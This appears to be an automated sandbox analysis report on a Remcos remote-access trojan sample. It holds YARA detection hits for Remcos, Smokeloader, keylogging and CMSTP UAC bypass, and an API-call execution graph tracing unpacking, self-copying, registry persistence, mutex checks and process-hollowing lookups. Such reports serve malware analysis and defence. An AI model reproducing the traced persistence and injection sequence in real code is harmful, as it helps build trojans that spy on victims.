                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:1.2%
                                                  Dynamic/Decrypted Code Coverage:23.6%
                                                  Signature Coverage:31.2%
                                                  Total number of Nodes:749
                                                  Total number of Limit Nodes:24
                                                  execution_graph 87579 404ab1 87580 404b17 87579->87580 87581 404aba 87579->87581 87582 404ae7 CreateEventA SetEvent WaitForSingleObject CloseHandle 87581->87582 87589 401f66 87581->87589 87582->87580 87585 401f66 28 API calls 87586 404adf 87585->87586 87593 41a686 79 API calls 87586->87593 87588 404ae4 87588->87582 87590 401f6e 87589->87590 87594 402301 87590->87594 87593->87588 87595 40230d 87594->87595 87598 402325 87595->87598 87597 401f80 87597->87585 87599 40232f 87598->87599 87601 40233a 87599->87601 87602 40294a 28 API calls 87599->87602 87601->87597 87602->87601 87603 20f003c 87604 20f0049 87603->87604 87618 20f0e0f SetErrorMode SetErrorMode 87604->87618 87609 20f0265 87610 20f02ce VirtualProtect 87609->87610 87612 20f030b 87610->87612 87611 20f0439 VirtualFree 87616 20f05f4 LoadLibraryA 87611->87616 87617 20f04be 87611->87617 87612->87611 87613 20f04e3 LoadLibraryA 87613->87617 87615 20f08c7 87616->87615 87617->87613 87617->87616 87619 20f0223 87618->87619 87620 20f0d90 87619->87620 87621 20f0dad 87620->87621 87622 20f0dbb GetPEB 87621->87622 87623 20f0238 VirtualAlloc 87621->87623 87622->87623 87623->87609 87624 530000 87627 530006 87624->87627 87628 530015 87627->87628 87631 5307a6 87628->87631 87632 5307c1 87631->87632 87633 5307ca CreateToolhelp32Snapshot 87632->87633 87634 5307e6 Module32First 87632->87634 87633->87632 87633->87634 87635 5307f5 87634->87635 87636 530005 87634->87636 87638 530465 87635->87638 87639 530490 87638->87639 87640 5304a1 VirtualAlloc 87639->87640 87641 5304d9 87639->87641 87640->87641 87641->87641 87642 403947 87643 403959 87642->87643 87673 403b60 87643->87673 87648 401fbd 28 API calls 87649 40398a 87648->87649 87680 41afc3 87649->87680 87652 4039ab 87701 401d64 87652->87701 87653 40399e 87654 4039a4 87653->87654 87655 4039ef 87653->87655 87710 403a10 96 API calls 87654->87710 87712 401d8c 87655->87712 87658 4039b6 87706 401ebd 87658->87706 87660 4039a9 87660->87655 87662 4039f8 87718 401eea 87662->87718 87665 403a01 87667 401eea 11 API calls 87665->87667 87666 401d64 22 API calls 87668 4039d8 87666->87668 87669 403a09 87667->87669 87670 401fbd 28 API calls 87668->87670 87671 4039e0 87670->87671 87711 404468 61 API calls ctype 87671->87711 87722 403c30 87673->87722 87676 401fbd 87677 401fcc 87676->87677 87738 402501 87677->87738 87679 401fea 87679->87648 87682 41afd6 87680->87682 87681 401eea 11 API calls 87683 41b078 87681->87683 87685 41b048 87682->87685 87688 403b60 28 API calls 87682->87688 87695 401eea 11 API calls 87682->87695 87700 41b046 87682->87700 87743 401eef 87682->87743 87747 41bfa9 28 API calls 87682->87747 87684 401eea 11 API calls 87683->87684 87686 41b080 87684->87686 87687 403b60 28 API calls 87685->87687 87689 401eea 11 API calls 87686->87689 87690 41b054 87687->87690 87688->87682 87691 403993 87689->87691 87692 401eef 11 API calls 87690->87692 87691->87652 87691->87653 87694 41b05d 87692->87694 87696 401eea 11 API calls 87694->87696 87695->87682 87697 41b065 87696->87697 87748 41bfa9 28 API calls 87697->87748 87700->87681 87702 401d6c 87701->87702 87704 401d74 87702->87704 87750 401fff 22 API calls 87702->87750 87704->87658 87708 401ec9 87706->87708 87707 401ee4 87707->87666 87708->87707 87709 402325 28 API calls 87708->87709 87709->87707 87710->87660 87711->87655 87713 40200a 87712->87713 87717 40203a 87713->87717 87751 402654 11 API calls 87713->87751 87715 40202b 87752 4026ba 11 API calls _Deallocate 87715->87752 87717->87662 87719 4021b9 87718->87719 87720 4021e8 87719->87720 87753 40262e 11 API calls _Deallocate 87719->87753 87720->87665 87723 403c39 87722->87723 87726 403c59 87723->87726 87727 403c68 87726->87727 87732 4032a4 87727->87732 87729 403c74 87730 402325 28 API calls 87729->87730 87731 40396c 87730->87731 87731->87676 87733 4032b0 87732->87733 87734 4032ad 87732->87734 87737 4032b6 22 API calls 87733->87737 87734->87729 87739 40250d 87738->87739 87741 40252b 87739->87741 87742 40261a 28 API calls 87739->87742 87741->87679 87742->87741 87744 401efe 87743->87744 87745 401f0a 87744->87745 87749 4021b9 11 API calls 87744->87749 87745->87682 87747->87682 87748->87700 87749->87745 87751->87715 87752->87717 87753->87720 87754 43a998 87755 43a9a4 _swprintf CallCatchBlock 87754->87755 87756 43a9b2 87755->87756 87758 43a9dc 87755->87758 87770 445354 20 API calls _abort 87756->87770 87765 444acc RtlEnterCriticalSection 87758->87765 87760 43a9b7 __cftoe __wsopen_s 87761 43a9e7 87766 43aa88 87761->87766 87765->87761 87768 43aa96 87766->87768 87767 43a9f2 87771 43aa0f RtlLeaveCriticalSection std::_Lockit::~_Lockit 87767->87771 87768->87767 87772 448416 36 API calls 2 library calls 87768->87772 87770->87760 87771->87760 87772->87768 87773 402bcc 87774 402bd7 87773->87774 87775 402bdf 87773->87775 87791 403315 28 API calls __Getctype 87774->87791 87777 402beb 87775->87777 87781 4015d3 87775->87781 87778 402bdd 87783 43360d 87781->87783 87784 402be9 87783->87784 87787 43362e std::_Facet_Register 87783->87787 87792 43a88c 87783->87792 87799 442200 7 API calls 2 library calls 87783->87799 87786 433dec std::_Facet_Register 87801 437bd7 RaiseException 87786->87801 87787->87786 87800 437bd7 RaiseException 87787->87800 87789 433e09 87791->87778 87798 446aff _strftime 87792->87798 87793 446b3d 87803 445354 20 API calls _abort 87793->87803 87795 446b28 RtlAllocateHeap 87796 446b3b 87795->87796 87795->87798 87796->87783 87798->87793 87798->87795 87802 442200 7 API calls 2 library calls 87798->87802 87799->87783 87800->87786 87801->87789 87802->87798 87803->87796 87804 4339be 87805 4339ca CallCatchBlock 87804->87805 87836 4336b3 87805->87836 87807 4339d1 87808 433b24 87807->87808 87812 4339fb 87807->87812 88127 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 87808->88127 87810 433b2b 88128 4426be 28 API calls _abort 87810->88128 87823 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 87812->87823 88121 4434d1 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 87812->88121 87813 433b31 88129 442670 28 API calls _abort 87813->88129 87816 433a14 87818 433a1a 87816->87818 88122 443475 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 87816->88122 87817 433b39 87820 433a9b 87847 433c5e 87820->87847 87823->87820 88123 43edf4 35 API calls 3 library calls 87823->88123 87830 433abd 87830->87810 87831 433ac1 87830->87831 87832 433aca 87831->87832 88125 442661 28 API calls _abort 87831->88125 88126 433842 13 API calls 2 library calls 87832->88126 87835 433ad2 87835->87818 87837 4336bc 87836->87837 88130 433e0a IsProcessorFeaturePresent 87837->88130 87839 4336c8 88131 4379ee 10 API calls 3 library calls 87839->88131 87841 4336cd 87846 4336d1 87841->87846 88132 44335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 87841->88132 87843 4336da 87844 4336e8 87843->87844 88133 437a17 8 API calls 3 library calls 87843->88133 87844->87807 87846->87807 88134 436050 87847->88134 87849 433c71 GetStartupInfoW 87850 433aa1 87849->87850 87851 443422 87850->87851 88135 44ddc9 87851->88135 87853 44342b 87855 433aaa 87853->87855 88139 44e0d3 35 API calls 87853->88139 87856 40d767 87855->87856 88141 41bce3 LoadLibraryA GetProcAddress 87856->88141 87858 40d783 GetModuleFileNameW 88146 40e168 87858->88146 87860 40d79f 87861 401fbd 28 API calls 87860->87861 87862 40d7ae 87861->87862 87863 401fbd 28 API calls 87862->87863 87864 40d7bd 87863->87864 87865 41afc3 28 API calls 87864->87865 87866 40d7c6 87865->87866 88161 40e8bd 87866->88161 87868 40d7cf 87869 401d8c 11 API calls 87868->87869 87870 40d7d8 87869->87870 87871 40d835 87870->87871 87872 40d7eb 87870->87872 87873 401d64 22 API calls 87871->87873 88335 40e986 111 API calls 87872->88335 87875 40d845 87873->87875 87878 401d64 22 API calls 87875->87878 87876 40d7fd 87877 401d64 22 API calls 87876->87877 87881 40d809 87877->87881 87879 40d864 87878->87879 88165 404cbf 87879->88165 88336 40e937 65 API calls 87881->88336 87882 40d873 88169 405ce6 87882->88169 87885 40d87f 87888 401eef 11 API calls 87885->87888 87886 40d824 88337 40e155 65 API calls 87886->88337 87889 40d88b 87888->87889 87890 401eea 11 API calls 87889->87890 87891 40d894 87890->87891 87893 401eea 11 API calls 87891->87893 87892 401eea 11 API calls 87894 40dc9f 87892->87894 87895 40d89d 87893->87895 88124 433c94 GetModuleHandleW 87894->88124 87896 401d64 22 API calls 87895->87896 87897 40d8a6 87896->87897 87898 401ebd 28 API calls 87897->87898 87899 40d8b1 87898->87899 87900 401d64 22 API calls 87899->87900 87901 40d8ca 87900->87901 87902 401d64 22 API calls 87901->87902 87904 40d8e5 87902->87904 87903 40d946 87906 401d64 22 API calls 87903->87906 87921 40e134 87903->87921 87904->87903 88338 4085b4 28 API calls 87904->88338 87911 40d95d 87906->87911 87907 40d912 87908 401eef 11 API calls 87907->87908 87909 40d91e 87908->87909 87912 401eea 11 API calls 87909->87912 87910 40d9a4 88172 40bed7 87910->88172 87911->87910 87916 4124b7 3 API calls 87911->87916 87913 40d927 87912->87913 88339 4124b7 RegOpenKeyExA 87913->88339 87915 40d9aa 87917 40d82d 87915->87917 88175 41a463 87915->88175 87922 40d988 87916->87922 87917->87892 87920 40d9c5 87923 40da18 87920->87923 88192 40697b 87920->88192 88369 412902 30 API calls 87921->88369 87922->87910 88342 412902 30 API calls 87922->88342 87925 401d64 22 API calls 87923->87925 87928 40da21 87925->87928 87937 40da32 87928->87937 87938 40da2d 87928->87938 87930 40e14a 88370 4112b5 64 API calls ___scrt_fastfail 87930->88370 87931 40d9e4 88343 40699d 30 API calls 87931->88343 87932 40d9ee 87935 401d64 22 API calls 87932->87935 87945 40d9f7 87935->87945 87940 401d64 22 API calls 87937->87940 88346 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 87938->88346 87939 40d9e9 88344 4064d0 97 API calls 87939->88344 87943 40da3b 87940->87943 88196 41ae08 87943->88196 87945->87923 87948 40da13 87945->87948 87946 40da46 88200 401e18 87946->88200 88345 4064d0 97 API calls 87948->88345 87949 40da51 88204 401e13 87949->88204 87952 40da5a 87953 401d64 22 API calls 87952->87953 87954 40da63 87953->87954 87955 401d64 22 API calls 87954->87955 87956 40da7d 87955->87956 87957 401d64 22 API calls 87956->87957 87958 40da97 87957->87958 87959 401d64 22 API calls 87958->87959 87961 40dab0 87959->87961 87960 40db1d 87962 40db2c 87960->87962 87968 40dcaa ___scrt_fastfail 87960->87968 87961->87960 87963 401d64 22 API calls 87961->87963 87964 401d64 22 API calls 87962->87964 87971 40dbb1 87962->87971 87966 40dac5 _wcslen 87963->87966 87965 40db3e 87964->87965 87967 401d64 22 API calls 87965->87967 87966->87960 87969 401d64 22 API calls 87966->87969 87970 40db50 87967->87970 88349 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 87968->88349 87972 40dae0 87969->87972 87974 401d64 22 API calls 87970->87974 87992 40dbac ___scrt_fastfail 87971->87992 87975 401d64 22 API calls 87972->87975 87976 40db62 87974->87976 87977 40daf5 87975->87977 87980 401d64 22 API calls 87976->87980 88208 40c89e 87977->88208 87978 40dcef 87979 401d64 22 API calls 87978->87979 87981 40dd16 87979->87981 87983 40db8b 87980->87983 87987 401f66 28 API calls 87981->87987 87986 401d64 22 API calls 87983->87986 87985 401e18 11 API calls 87988 40db14 87985->87988 87989 40db9c 87986->87989 87990 40dd25 87987->87990 87991 401e13 11 API calls 87988->87991 88265 40bc67 87989->88265 88350 4126d2 14 API calls 87990->88350 87991->87960 87992->87971 88347 4128a2 31 API calls 87992->88347 87996 40dc45 ctype 88000 401d64 22 API calls 87996->88000 87997 40dd3b 87998 401d64 22 API calls 87997->87998 87999 40dd47 87998->87999 88351 43a5e7 39 API calls _strftime 87999->88351 88003 40dc5c 88000->88003 88002 40dd54 88004 40dd81 88002->88004 88352 41beb0 87 API calls ___scrt_fastfail 88002->88352 88003->87978 88005 401d64 22 API calls 88003->88005 88009 401f66 28 API calls 88004->88009 88007 40dc7e 88005->88007 88010 41ae08 28 API calls 88007->88010 88008 40dd65 CreateThread 88008->88004 88511 41c96f 10 API calls 88008->88511 88011 40dd96 88009->88011 88012 40dc87 88010->88012 88013 401f66 28 API calls 88011->88013 88348 40e219 112 API calls 88012->88348 88015 40dda5 88013->88015 88353 41a686 79 API calls 88015->88353 88016 40dc8c 88016->87978 88018 40dc93 88016->88018 88018->87917 88019 40ddaa 88020 401d64 22 API calls 88019->88020 88021 40ddb6 88020->88021 88022 401d64 22 API calls 88021->88022 88023 40ddcb 88022->88023 88024 401d64 22 API calls 88023->88024 88025 40ddeb 88024->88025 88354 43a5e7 39 API calls _strftime 88025->88354 88027 40ddf8 88028 401d64 22 API calls 88027->88028 88029 40de03 88028->88029 88030 401d64 22 API calls 88029->88030 88031 40de14 88030->88031 88032 401d64 22 API calls 88031->88032 88033 40de29 88032->88033 88034 401d64 22 API calls 88033->88034 88035 40de3a 88034->88035 88036 40de41 StrToIntA 88035->88036 88355 409517 143 API calls _wcslen 88036->88355 88038 40de53 88039 401d64 22 API calls 88038->88039 88041 40de5c 88039->88041 88040 40dea1 88044 401d64 22 API calls 88040->88044 88041->88040 88356 43360d 22 API calls 3 library calls 88041->88356 88043 40de71 88045 401d64 22 API calls 88043->88045 88048 40deb1 88044->88048 88046 40de84 88045->88046 88049 40de8b CreateThread 88046->88049 88047 40def9 88051 401d64 22 API calls 88047->88051 88048->88047 88357 43360d 22 API calls 3 library calls 88048->88357 88049->88040 88507 419128 109 API calls 2 library calls 88049->88507 88056 40df02 88051->88056 88052 40dec6 88053 401d64 22 API calls 88052->88053 88054 40ded8 88053->88054 88057 40dedf CreateThread 88054->88057 88055 40df6c 88058 401d64 22 API calls 88055->88058 88056->88055 88059 401d64 22 API calls 88056->88059 88057->88047 88510 419128 109 API calls 2 library calls 88057->88510 88061 40df75 88058->88061 88060 40df1e 88059->88060 88063 401d64 22 API calls 88060->88063 88062 40dfba 88061->88062 88064 401d64 22 API calls 88061->88064 88361 41a7a2 30 API calls 88062->88361 88065 40df33 88063->88065 88067 40df8a 88064->88067 88358 40c854 32 API calls 88065->88358 88073 401d64 22 API calls 88067->88073 88068 40dfc3 88069 401e18 11 API calls 88068->88069 88070 40dfce 88069->88070 88072 401e13 11 API calls 88070->88072 88075 40dfd7 CreateThread 88072->88075 88076 40df9f 88073->88076 88074 40df46 88077 401e18 11 API calls 88074->88077 88080 40e004 88075->88080 88081 40dff8 CreateThread 88075->88081 88512 40e54f 82 API calls 88075->88512 88359 43a5e7 39 API calls _strftime 88076->88359 88079 40df52 88077->88079 88082 401e13 11 API calls 88079->88082 88083 40e019 88080->88083 88084 40e00d CreateThread 88080->88084 88081->88080 88506 410f36 139 API calls 88081->88506 88086 40df5b CreateThread 88082->88086 88088 40e073 88083->88088 88090 401f66 28 API calls 88083->88090 88084->88083 88508 411524 38 API calls ___scrt_fastfail 88084->88508 88086->88055 88509 40196b 49 API calls _strftime 88086->88509 88087 40dfac 88360 40b95c 7 API calls 88087->88360 88364 41246e RegOpenKeyExA RegQueryValueExA RegCloseKey 88088->88364 88091 40e046 88090->88091 88362 404c9e 28 API calls 88091->88362 88094 40e053 88096 401f66 28 API calls 88094->88096 88095 40e08b 88097 40e12a 88095->88097 88100 41ae08 28 API calls 88095->88100 88098 40e062 88096->88098 88367 40cbac 27 API calls 88097->88367 88363 41a686 79 API calls 88098->88363 88103 40e0a4 88100->88103 88102 40e12f 88368 413fd4 170 API calls _strftime 88102->88368 88365 412584 31 API calls 88103->88365 88104 40e067 88106 401eea 11 API calls 88104->88106 88106->88088 88108 40e0ba 88109 401e13 11 API calls 88108->88109 88112 40e0c5 88109->88112 88110 40e0ed DeleteFileW 88111 40e0f4 88110->88111 88110->88112 88114 41ae08 28 API calls 88111->88114 88112->88110 88112->88111 88113 40e0db Sleep 88112->88113 88113->88112 88115 40e104 88114->88115 88366 41297a RegOpenKeyExW RegDeleteValueW 88115->88366 88117 40e117 88118 401e13 11 API calls 88117->88118 88119 40e121 88118->88119 88120 401e13 11 API calls 88119->88120 88120->88097 88121->87816 88122->87823 88123->87820 88124->87830 88125->87832 88126->87835 88127->87810 88128->87813 88129->87817 88130->87839 88131->87841 88132->87843 88133->87846 88134->87849 88136 44dddb 88135->88136 88137 44ddd2 88135->88137 88136->87853 88140 44dcc8 48 API calls 4 library calls 88137->88140 88139->87853 88140->88136 88142 41bd22 LoadLibraryA GetProcAddress 88141->88142 88143 41bd12 GetModuleHandleA GetProcAddress 88141->88143 88144 41bd4b 32 API calls 88142->88144 88145 41bd3b LoadLibraryA GetProcAddress 88142->88145 88143->88142 88144->87858 88145->88144 88371 41a63f FindResourceA 88146->88371 88149 43a88c ___std_exception_copy 21 API calls 88150 40e192 ctype 88149->88150 88374 401f86 88150->88374 88153 401eef 11 API calls 88154 40e1b8 88153->88154 88155 401eea 11 API calls 88154->88155 88156 40e1c1 88155->88156 88157 43a88c ___std_exception_copy 21 API calls 88156->88157 88158 40e1d2 ctype 88157->88158 88378 406052 88158->88378 88160 40e205 88160->87860 88162 40e8ca 88161->88162 88164 40e8da 88162->88164 88381 40200a 11 API calls 88162->88381 88164->87868 88166 404ccb 88165->88166 88382 402e78 88166->88382 88168 404cee 88168->87882 88391 404bc4 88169->88391 88171 405cf4 88171->87885 88400 401e8f 88172->88400 88174 40bee1 CreateMutexA GetLastError 88174->87915 88402 41b15b 88175->88402 88177 41a471 88406 412513 RegOpenKeyExA 88177->88406 88180 401eef 11 API calls 88181 41a49f 88180->88181 88182 401eea 11 API calls 88181->88182 88183 41a4a7 88182->88183 88184 41a4fa 88183->88184 88185 412513 31 API calls 88183->88185 88184->87920 88186 41a4cd 88185->88186 88187 41a4d8 StrToIntA 88186->88187 88188 41a4ef 88187->88188 88189 41a4e6 88187->88189 88191 401eea 11 API calls 88188->88191 88411 41c102 22 API calls 88189->88411 88191->88184 88193 40698f 88192->88193 88194 4124b7 3 API calls 88193->88194 88195 406996 88194->88195 88195->87931 88195->87932 88197 41ae1c 88196->88197 88412 40b027 88197->88412 88199 41ae24 88199->87946 88201 401e27 88200->88201 88203 401e33 88201->88203 88421 402121 11 API calls 88201->88421 88203->87949 88205 402121 88204->88205 88206 402150 88205->88206 88422 402718 11 API calls _Deallocate 88205->88422 88206->87952 88209 40c8ba 88208->88209 88210 40c8d0 88209->88210 88211 40c8da 88209->88211 88212 40c90f 88209->88212 88214 40ca03 GetLongPathNameW 88210->88214 88427 41a74b 29 API calls 88211->88427 88215 41b15b 2 API calls 88212->88215 88423 403b40 88214->88423 88218 40c914 88215->88218 88216 40c8e3 88219 401e18 11 API calls 88216->88219 88221 40c918 88218->88221 88222 40c96a 88218->88222 88223 40c8ed 88219->88223 88226 403b40 28 API calls 88221->88226 88225 403b40 28 API calls 88222->88225 88230 401e13 11 API calls 88223->88230 88224 403b40 28 API calls 88228 40ca27 88224->88228 88229 40c978 88225->88229 88227 40c926 88226->88227 88235 403b40 28 API calls 88227->88235 88430 40cc37 28 API calls 88228->88430 88234 403b40 28 API calls 88229->88234 88230->88210 88232 40ca3a 88431 402860 28 API calls 88232->88431 88237 40c98e 88234->88237 88238 40c93c 88235->88238 88236 40ca45 88432 402860 28 API calls 88236->88432 88429 402860 28 API calls 88237->88429 88428 402860 28 API calls 88238->88428 88242 40ca4f 88245 401e13 11 API calls 88242->88245 88243 40c999 88246 401e18 11 API calls 88243->88246 88244 40c947 88247 401e18 11 API calls 88244->88247 88248 40ca59 88245->88248 88249 40c9a4 88246->88249 88250 40c952 88247->88250 88251 401e13 11 API calls 88248->88251 88252 401e13 11 API calls 88249->88252 88253 401e13 11 API calls 88250->88253 88254 40ca62 88251->88254 88255 40c9ad 88252->88255 88256 40c95b 88253->88256 88257 401e13 11 API calls 88254->88257 88258 401e13 11 API calls 88255->88258 88259 401e13 11 API calls 88256->88259 88260 40ca6b 88257->88260 88258->88223 88259->88223 88261 401e13 11 API calls 88260->88261 88262 40ca74 88261->88262 88263 401e13 11 API calls 88262->88263 88264 40ca7d 88263->88264 88264->87985 88266 40bc7a _wcslen 88265->88266 88267 40bc84 88266->88267 88268 40bcce 88266->88268 88270 40bc8d CreateDirectoryW 88267->88270 88269 40c89e 32 API calls 88268->88269 88271 40bce0 88269->88271 88434 40856b 88270->88434 88272 401e18 11 API calls 88271->88272 88274 40bccc 88272->88274 88276 401e13 11 API calls 88274->88276 88275 40bca9 88468 4028cf 88275->88468 88281 40bcf7 88276->88281 88278 40bcb5 88279 401e18 11 API calls 88278->88279 88280 40bcc3 88279->88280 88282 401e13 11 API calls 88280->88282 88283 40bd10 88281->88283 88284 40bd2d 88281->88284 88282->88274 88287 40bb7b 31 API calls 88283->88287 88285 40bd36 CopyFileW 88284->88285 88286 40be07 88285->88286 88288 40bd48 _wcslen 88285->88288 88440 40bb7b 88286->88440 88316 40bd21 88287->88316 88288->88286 88290 40bd64 88288->88290 88291 40bdb7 88288->88291 88294 40c89e 32 API calls 88290->88294 88293 40c89e 32 API calls 88291->88293 88299 40bdbd 88293->88299 88298 40bd6a 88294->88298 88295 40be21 88303 40be2a SetFileAttributesW 88295->88303 88296 40be4d 88297 40be95 CloseHandle 88296->88297 88300 403b40 28 API calls 88296->88300 88466 401e07 88297->88466 88302 401e18 11 API calls 88298->88302 88301 401e18 11 API calls 88299->88301 88305 40be63 88300->88305 88334 40bdb1 88301->88334 88306 40bd76 88302->88306 88318 40be39 _wcslen 88303->88318 88308 41ae08 28 API calls 88305->88308 88309 401e13 11 API calls 88306->88309 88307 40beb1 ShellExecuteW 88310 40bec4 88307->88310 88311 40bece ExitProcess 88307->88311 88312 40be76 88308->88312 88313 40bd7f 88309->88313 88315 40bed7 CreateMutexA GetLastError 88310->88315 88471 412774 RegCreateKeyW 88312->88471 88317 40856b 28 API calls 88313->88317 88314 401e13 11 API calls 88320 40bdcf 88314->88320 88315->88316 88316->87992 88319 40bd93 88317->88319 88318->88296 88321 40be4a SetFileAttributesW 88318->88321 88324 4028cf 28 API calls 88319->88324 88323 40bddb CreateDirectoryW 88320->88323 88321->88296 88327 401e07 88323->88327 88326 40bd9f 88324->88326 88328 401e18 11 API calls 88326->88328 88330 40bdeb CopyFileW 88327->88330 88331 40bda8 88328->88331 88329 401e13 11 API calls 88329->88297 88330->88286 88332 40bdf8 88330->88332 88333 401e13 11 API calls 88331->88333 88332->88316 88333->88334 88334->88314 88335->87876 88336->87886 88338->87907 88340 4124e1 RegQueryValueExA RegCloseKey 88339->88340 88341 41250b 88339->88341 88340->88341 88341->87903 88342->87910 88343->87939 88344->87932 88345->87923 88346->87937 88347->87996 88348->88016 88349->87978 88350->87997 88351->88002 88352->88008 88353->88019 88354->88027 88355->88038 88356->88043 88357->88052 88358->88074 88359->88087 88360->88062 88361->88068 88362->88094 88363->88104 88364->88095 88365->88108 88366->88117 88367->88102 88505 419e89 104 API calls 88368->88505 88369->87930 88372 40e183 88371->88372 88373 41a65c LoadResource LockResource SizeofResource 88371->88373 88372->88149 88373->88372 88375 401f8e 88374->88375 88376 402325 28 API calls 88375->88376 88377 401fa4 88376->88377 88377->88153 88379 401f86 28 API calls 88378->88379 88380 406066 88379->88380 88380->88160 88381->88164 88384 402e85 88382->88384 88383 402ea9 88383->88168 88384->88383 88385 402e98 88384->88385 88387 402eae 88384->88387 88389 403445 28 API calls 88385->88389 88387->88383 88390 40225b 11 API calls 88387->88390 88389->88383 88390->88383 88392 404bd0 88391->88392 88395 40245c 88392->88395 88394 404be4 88394->88171 88396 402469 88395->88396 88398 402478 88396->88398 88399 402ad3 28 API calls 88396->88399 88398->88394 88399->88398 88401 401e94 88400->88401 88403 41b183 88402->88403 88404 41b168 GetCurrentProcess IsWow64Process 88402->88404 88403->88177 88404->88403 88405 41b17f 88404->88405 88405->88177 88407 412541 RegQueryValueExA RegCloseKey 88406->88407 88408 412569 88406->88408 88407->88408 88409 401f66 28 API calls 88408->88409 88410 41257e 88409->88410 88410->88180 88411->88188 88413 40b02f 88412->88413 88416 40b04b 88413->88416 88415 40b045 88415->88199 88417 40b055 88416->88417 88419 40b060 88417->88419 88420 40b138 28 API calls 88417->88420 88419->88415 88420->88419 88421->88203 88422->88206 88424 403b48 88423->88424 88433 403b7a 28 API calls 88424->88433 88426 403b5a 88426->88224 88427->88216 88428->88244 88429->88243 88430->88232 88431->88236 88432->88242 88433->88426 88435 408577 88434->88435 88477 402ca8 88435->88477 88439 4085a3 88439->88275 88441 40bba1 88440->88441 88442 40bbdd 88440->88442 88495 40b0dd 88441->88495 88444 40bc1e 88442->88444 88447 40b0dd 28 API calls 88442->88447 88446 40bc5f 88444->88446 88450 40b0dd 28 API calls 88444->88450 88446->88295 88446->88296 88448 40bbf4 88447->88448 88451 4028cf 28 API calls 88448->88451 88449 4028cf 28 API calls 88452 40bbbd 88449->88452 88453 40bc35 88450->88453 88454 40bbfe 88451->88454 88455 412774 14 API calls 88452->88455 88456 4028cf 28 API calls 88453->88456 88457 412774 14 API calls 88454->88457 88458 40bbd1 88455->88458 88459 40bc3f 88456->88459 88460 40bc12 88457->88460 88461 401e13 11 API calls 88458->88461 88462 412774 14 API calls 88459->88462 88463 401e13 11 API calls 88460->88463 88461->88442 88464 40bc53 88462->88464 88463->88444 88465 401e13 11 API calls 88464->88465 88465->88446 88467 401e0c 88466->88467 88501 402d8b 88468->88501 88470 4028dd 88470->88278 88472 412789 88471->88472 88473 4127c6 88471->88473 88476 4127a2 RegSetValueExW RegCloseKey 88472->88476 88474 401e13 11 API calls 88473->88474 88475 40be89 88474->88475 88475->88329 88476->88473 88478 402cb5 88477->88478 88479 402cc8 88478->88479 88481 402cd9 88478->88481 88482 402cde 88478->88482 88488 403374 28 API calls 88479->88488 88484 402de3 88481->88484 88482->88481 88489 402f21 11 API calls 88482->88489 88485 402daf 88484->88485 88490 4030f7 88485->88490 88487 402dcd 88487->88439 88488->88481 88489->88481 88491 403101 88490->88491 88493 403115 88491->88493 88494 4036c2 28 API calls 88491->88494 88493->88487 88494->88493 88496 40b0e9 88495->88496 88497 402ca8 28 API calls 88496->88497 88498 40b10c 88497->88498 88499 402de3 28 API calls 88498->88499 88500 40b11f 88499->88500 88500->88449 88502 402d97 88501->88502 88503 4030f7 28 API calls 88502->88503 88504 402dab 88503->88504 88504->88470 88513 411637 62 API calls 88506->88513

                                                  Executed Functions

                                                  Function 0041BCE3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                  • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                  • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                  • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
